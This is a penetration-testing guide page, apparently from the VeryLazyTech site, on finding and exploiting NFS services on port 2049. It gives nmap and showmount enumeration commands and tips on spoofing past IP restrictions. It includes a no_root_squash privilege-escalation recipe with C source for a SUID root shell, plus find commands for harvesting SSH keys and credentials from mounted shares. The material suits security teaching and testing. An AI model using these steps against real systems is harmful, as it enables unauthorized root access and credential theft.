NFS Service - Port 2049

Become VeryLazyTech member! 🎁
Follow us on:
- ✖ Twitter @VeryLazyTech.
- 👾 Github @VeryLazyTech.
- 📜 Medium @VeryLazyTech.
- 📺 YouTube @VeryLazyTech.
- 📩 Telegram @VeryLazyTech.
- 🕵️‍♂️ My Site @VeryLazyTech.
Visit our shop for e-books and courses. 📚

Basic info

The Network File System (NFS) allows file sharing across Unix-like systems over a network. While convenient, NFS often exposes sensitive data and trust relationships due to misconfigurations or outdated security models. This guide delivers in-depth methods for discovering, analyzing, and exploiting NFS services during penetration testing engagements.

Identifying NFS Services During Network Reconnaissance

Port Scanning and Service Enumeration

NFS uses the following ports:

TCP/UDP 2049 – NFS Service
TCP/UDP 111 – Portmapper (rpcbind)

Run a detailed Nmap scan:

nmap -sV -sT -p 111,2049 --script=nfs-showmount,nfs-ls,nfs-statfs <target-ip>

Check for exposed mount points and exports.

Enumerating NFS Exports

Using `showmount`

Check accessible NFS shares:

showmount -e <target-ip>

Example output:

Export list for 10.0.0.1:
/home           *
/var/nfs        192.168.0.0/24

* means accessible from any host
CIDR indicates trusted networks

Bypassing IP-based Access Controls

Use spoofed IP addresses or proxy from allowed subnets. In some cases, a misconfigured DNS resolution can allow access even if IP-based restrictions are in place.

Mounting NFS Shares and Privilege Analysis

Mounting an Export Locally

mkdir /mnt/nfs
mount -t nfs <target-ip>:/home /mnt/nfs

Check for files with improper permissions or user credentials.

UID/GID Mappings and Root Squashing

By default, NFS applies root squashing: remote root becomes nfsnobody. Check /etc/exports configuration for no_root_squash option:

/home *(rw,sync,no_root_squash)

If no_root_squash is set, root access is preserved, allowing privilege escalation.

Exploiting no_root_squash for Remote Code Execution

Step-by-Step Attack

Create a SUID Binary on Mounted Share

echo -e '#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\nint main(){setuid(0); system("/bin/bash");}' > rootsh.c
gcc rootsh.c -o rootsh
chmod +s rootsh
mv rootsh /mnt/nfs/

Trigger Execution on Target If the NFS share is mounted by a target system, wait for the binary to sync and then trigger execution through a scheduled task or user login.
Gain Shell with Root Privileges

Enumerating and Extracting Sensitive Files

Commands to Discover Valuable Files

find /mnt/nfs -type f -name "*.conf"
find /mnt/nfs -type f -name "*.pem"
find /mnt/nfs -type f -perm -4000

Look for:

SSH private keys
Database credentials
Password backup files
Misconfigured .bashrc, .profile, or crontabs

Learn & practice For the Bug Bounty

Support VeryLazyTech 🎉

Become VeryLazyTech member! 🎁

Follow us on:
- ✖ Twitter @VeryLazyTech.
- 👾 Github @VeryLazyTech.
- 📜 Medium @VeryLazyTech.
- 📺 YouTube @VeryLazyTech.
- 📩 Telegram @VeryLazyTech.
- 🕵️‍♂️ My Site @VeryLazyTech.
Visit our shop for e-books and courses. 📚

PreviousCompaq HP Insight Manager - Port 2301, 2381 NextDocker - Port 2375,2376

Last updated 2 months ago

Was this helpful?